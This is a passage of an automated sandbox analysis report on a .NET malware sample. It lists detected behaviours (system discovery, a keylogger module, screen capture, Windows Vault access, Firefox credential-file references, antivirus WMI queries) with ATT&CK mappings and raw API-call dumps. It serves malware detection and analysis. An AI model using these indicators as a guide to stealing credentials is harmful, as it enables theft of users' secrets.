140100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b0020003100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"RtlGetVersion\" with parameter 1c0100000600000001000000b11d000002000000530065007200760069006300650020005000610063006b002000310000002f000000000074012f0000000000060000000000000050012f001a000000600b3300000000001a0000000000000014000000000000000000000000000000000000000000000002000002c89c3200630400670000000000000000000000008000000000000000912000b148e432000100000000000000020000000c000000709b3200709b32006b9b3200000000000000000000002f0000000001d0f3270000000000f0f9270095e1c47708231700feffffff435cc8775059c87794000000a00000006a9b3200689b32009400000074f52700fdfe4b760000000018000000b6470cab (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-146", "type": 6, "relevance": 3, "name": "Calls an API typically used to determine if process is running under WOW64", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"IsWow64Process\" with parameter \"6044\" - (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-35", "type": 3, "relevance": 5, "name": "Reads the active computer name", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\COMPUTERNAME\\ACTIVECOMPUTERNAME\"; Key: \"COMPUTERNAME\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "string-171", "type": 2, "relevance": 1, "name": "Contains ability to retrieve the OS information (API string)", "description": "Found reference to API \",3024,,RtlGetVersion,NTDLL.d\" (Indicator: \"GetVersion\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-152", "relevance": 1, "name": "Contains ability to retrieve current user details (Dotnet)", "description": "Observed Namespace \"System.Security.Principal.WindowsIdentity\" and MemberReference \"GetCurrent\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-137", "relevance": 1, "name": "Contains ability to retrieve network adapter information (Dotnet)", "description": "Observed namespace \"System.Net.NetworkInformation\" and TypeReference \"NetworkInterface\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1016", "attck_id_wiki": "https://attack.mitre.org/techniques/T1016"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-119", "relevance": 1, "name": "Contains ability to gather system environment details", "description": "Observed function \"GetEnvironmentVariable\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"ExpandEnvironmentVariables\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-124", "type": 6, "relevance": 3, "name": "Calls an API typically used to get product type", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"RtlGetNtProductType\" with parameter 01000000 (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-148", "type": 6, "relevance": 3, "name": "Calls an API typically used to retrieve account information for specified SID", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"LookupAccountSidW\" with param Name %OSUSER% (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-1", "type": 3, "relevance": 5, "name": "Reads the cryptographic machine GUID", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SOFTWARE\\MICROSOFT\\CRYPTOGRAPHY\"; Key: \"MACHINEGUID\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "stream-79", "type": 1, "relevance": 3, "name": "Contains ability to retrieve system language", "description": "Client.Modules.Keylogger.Keylogger::GetKeyboardLayout(System.UInt32) at 74d47b52ea65535614a0d1c0e6076ff9-600029e-Keylogger~KeyboardLayout", "origin": "Hybrid Analysis Technology", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "api-222", "type": 6, "relevance": 2, "name": "Calls an API typically used to retrieve OS information", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000905831001cf66700145cc877435cc877e8f667000100000094012f00010000009cf56700935cc9774083d077d4a0c877bcc4b877e8f66700010000000100000058c03100000000006cf567009cf5670008f6670095e1c477d8351700feffffffd4a0c8771bbeca750000a67700000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000000000000000000000000000000000000000001005c005300e03932001100001136ef0000b80b3300c89c3200b1080000aaa8640000200000b0080000580f00000d004200a2000000b1080000a1000000a1080000c9570000000000000000000036a8ffff5c00500000000000b1080000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b203100aff8f5c204b29c357634375f6b000000000100000000000000010000001cf6c204000000002812a30158f6c204086f390028f6c2048f9c357634375f6b020000000000000018000000010000002cf6c2042823a56b00002f00000000000c0000006042a40138f6c2042f995f6b0c000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000040633800100000000000000098a6270050dc4e774063380010000000446338000000000010000000d0a627006eaaeb6db8dcea6d74e1ed9f2812a30102000000000000001800000044633800d4a627002823a56b00002f00000000000c000000f826e56de0a627002f995f6b0c000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000001000000cca727006a6f3d65907036ab40a32700441534a760a9270015deb1776012a2dcfeffffff7f67b977e2d84476f010096efe42096e88a7270002000000000000001800000080a727008ca727002823a56b00002f00000000000c00000030a55f6b98a727002f995f6b0c000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b2031000404c6676bf0bf38000000000030f3e104784e676bf0bf380078f3e104d724666bf0bf380020000000000000009c39666b2812a3012082a4012812a30102000000000000001800000000bf38007cf3e1042823a56b00002f00000000000c0000002082a40188f3e1042f995f6b0c000000 (UID: 00000000-00006044)\n \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" called \"GetVersionExA\" with parameter 940000000600000001000000b11d00000200000053657276696365205061636b20310000e0bd3a0020000000000000008ca6270050dc4e77e0bd3a0010000000e4bd3a000000000010000000c4a627006eaaeb6db8dcea6d60e1ed9f2812a301020000000000000018000000e4bd3a00c8a627002823a56b00002f00000000000c000000f826e56dd4a627002f995f6b0c000000 (UID: 00000000-00006044)", "origin": "API Call", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "registry-78", "type": 3, "relevance": 1, "name": "Contains ability to read software policies", "description": "\"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1.exe\" (Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\WINDOWS\\SAFER\\CODEIDENTIFIERS\"; Key: \"TRANSPARENTENABLED\")", "origin": "Registry Access", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-114", "relevance": 1, "name": "Contains ability to execute WMI queries (Dotnet)", "description": "Observed namespace \"System.Management.ManagementObjectSearcher\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1047", "attck_id_wiki": "https://attack.mitre.org/techniques/T1047"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-120", "relevance": 1, "name": "Contains ability to gather system information (Dotnet)", "description": "Observed function \"get_MachineName\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"get_UserName\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"get_Is64BitOperatingSystem\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"get_OSVersion\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"\n Observed function \"get_SystemDirectory\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Environment Awareness", "identifier": "static-156", "relevance": 1, "name": "Contains ability to retrieve security identifier details", "description": "Observed Namespace \"System.Security.Principal.SecurityIdentifier\" and MemberReference \".ctor\" in \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\"", "origin": "Static Parser", "attck_id": "T1033", "attck_id_wiki": "https://attack.mitre.org/techniques/T1033"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-57", "type": 2, "relevance": 3, "name": "Contains CRYPTO related strings", "description": "Found string \"Aes256\" (Indicator: \"aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Aes256\" (Indicator: \"aes256\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"aes256\" (Indicator: \"aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"aes256\" (Indicator: \"aes256\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"BCRYPT_AES_ALGORITHM\" (Indicator: \"aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"RijndaelManaged\" (Indicator: \"rijndael\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"RijndaelManaged\" (Indicator: \"Rijndaelmanaged\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"CryptoStreamMode\" (Indicator: \"cryptostream\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"CryptoStreamMode\" (Indicator: \"cryptostreammode\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"ZipFile\" (Indicator: \"zipfile\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"FromBase64String\" (Indicator: \"base64\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"FromBase64String\" (Indicator: \"FromBase64String\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"ToBase64String\" (Indicator: \"base64\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"ToBase64String\" (Indicator: \"ToBase64String\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"CryptoStream\" (Indicator: \"cryptostream\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"GZipStream\" (Indicator: \"GzipStream\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"cAesGcm\" (Indicator: \"aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"MD5CryptoServiceProvider\" (Indicator: \"md5cryptoserviceprovider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"RSACryptoServiceProvider\" (Indicator: \"RsaCryptoServiceProvider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"AesCryptoServiceProvider\" (Indicator: \"aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"AesCryptoServiceProvider\" (Indicator: \"aescryptoserviceprovider\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"CreateDecryptor\" (Indicator: \"createdecryptor\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"CreateEncryptor\" (Indicator: \"createencryptor\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"System.Security.Cryptography.X509Certificates\" (Indicator: \"System.Security.Cryptography\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"System.Security.Cryptography\" (Indicator: \"System.Security.Cryptography\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Maestro Card\" (Indicator: \"aes\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"description=\"Uses RsaCryptoServiceProvider to encrypt and decrypt\"\" (Indicator: \"RsaCryptoServiceProvider\"; Source: \"00000000-00006044.00000000.66236.002F0000.00000004.mdmp, 00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"icrosoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"FTWARE\\Microsoft\\Cryptography\\Defaults\\Provider\\Microsoft Enhanced RSA and AES Cryptographic Provider\" (Indicator: \"aes\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"aestro Card\" (Indicator: \"aes\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"Aes256\" (Indicator: \"aes\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"Aes256\" (Indicator: \"aes256\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-627", "type": 2, "relevance": 1, "name": "Able to access Windows Vault", "description": "Found string \"VAULT_ITEM_WIN7\" (Indicator: \"VAULT_ITEM_WIN7\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultGetItem_WIN7\" (Indicator: \"VaultGetItem_WIN7\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultGetItem_WIN7\" (Indicator: \"VaultGetItem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VAULT_ITEM_WIN8\" (Indicator: \"VAULT_ITEM_WIN8\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultGetItem_WIN8\" (Indicator: \"VaultGetItem_WIN8\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultGetItem_WIN8\" (Indicator: \"VaultGetItem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VAULT_SCHEMA_ELEMENT_ID\" (Indicator: \"VAULT_SCHEMA_ELEMENT_ID\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VAULT_ELEMENT_TYPE\" (Indicator: \"VAULT_ELEMENT_TYPE\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VAULT_ITEM_ELEMENT\" (Indicator: \"VAULT_ITEM_ELEMENT\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultFree\" (Indicator: \"VaultFree\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultGetItem\" (Indicator: \"VaultGetItem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultEnumerateItems\" (Indicator: \"VaultEnumerateItems\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultEnumerateVaults\" (Indicator: \"VaultEnumerateVaults\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultCloseVault\" (Indicator: \"VaultCloseVault\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"VaultOpenVault\" (Indicator: \"VaultOpenVault\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")", "origin": "File/Memory", "attck_id": "T1555.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/004"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-207", "type": 2, "relevance": 1, "name": "Contains ability to retrieve file and directory information (API string)", "description": "Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"Win32API|File Installation Library Functions|GetFileVersionInfo\" (Indicator: \"GetFileVersionInfo\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found reference to API \"GetTempFileName\" (Indicator: \"GetTempFileName\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetTempPath\" (Indicator: \"GetTempPath\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-78", "type": 2, "relevance": 1, "name": "Contains ability to capture screen (API string)", "description": "Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"CopyFromScreen\" (Indicator: \"CopyFromScreen\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1113", "attck_id_wiki": "https://attack.mitre.org/techniques/T1113"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-507", "type": 2, "relevance": 1, "name": "References to WMI query strings used for information discovery", "description": "Found string \"Select * from Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_VideoController\" (Indicator: \" Win32_VideoController\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select * from AntivirusProduct\" (Indicator: \"antivirusproduct\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \" Win32_OperatingSystem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select ProcessorId From Win32_processor\" (Indicator: \" Win32_Processor\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"Select * From Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"SELECT * FROM Win32_PnPEntity WHERE (PNPClass = 'Image' OR PNPClass = 'Camera')\" (Indicator: \" Win32_PnPEntity\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"rom Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ECT * FROM Win32_VideoController\" (Indicator: \" Win32_VideoController\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Processor\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"om Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; File: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"SELECT * FROM Win32_VideoController\" (Indicator: \" Win32_VideoController\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"SELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"CIM_PCVideoController\" (Indicator: \"CIM_PCVideoController\"; Source: \"00000000-00006044.00000001.68159.002F0000.00000004.mdmp, 00000000-00006044.00000002.70084.002F0000.00000004.mdmp\")\n Found string \"elect * from Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_VideoController\" (Indicator: \" Win32_VideoController\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"elect * from AntivirusProduct\" (Indicator: \"antivirusproduct\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"SELECT * FROM win32_operatingsystem\" (Indicator: \" Win32_OperatingSystem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"elect ProcessorId From Win32_processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ELECT * FROM Win32_Processor\" (Indicator: \" Win32_Processor\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"elect * From Win32_ComputerSystem\" (Indicator: \" Win32_ComputerSystem\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found string \"ELECT ExecutablePath, ProcessID FROM Win32_Process\" (Indicator: \" Win32_Process\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")", "origin": "File/Memory", "attck_id": "T1082", "attck_id_wiki": "https://attack.mitre.org/techniques/T1082"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-405", "type": 2, "relevance": 1, "name": "References Firefox browser credentials files", "description": "Found string \"key3.db\" (Indicator: \"key3.db\"; in File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found string \"key4.db\" (Indicator: \"key4.db\"; in File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")", "origin": "File/Memory", "attck_id": "T1555.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1555/003"}, {"threat_level_human": "informative", "category": "Spyware/Information Retrieval", "identifier": "string-85", "type": 2, "relevance": 1, "name": "Contains ability to enumerate process and/or its information (API string)", "description": "Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetProcessList\" (Indicator: \"ProcessList\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"BlockNetworkActivityProcessList\" (Indicator: \"ProcessList\"; File: \"3e921b459b8dee082170d992356a5329873f2a22cf509be6c3010f75d71c90e1\")\n Found reference to API \"GetProcessById\" (Indicator: \"GetProcessById\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetModuleHandle\" (Indicator: \"GetModuleHandle\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetProcessesByName\" (Indicator: \"GetProcessesByName\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetCurrentProcess\" (Indicator: \"GetCurrentProcess\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"GetProcessList\" (Indicator: \"ProcessList\"; Source: \"00000000-00006044.00000002.70084.00972000.00000020.mdmp\")\n Found reference to API \"BlockNetworkActivityProcessList\" (Indicator: \"ProcessList\"; Source: 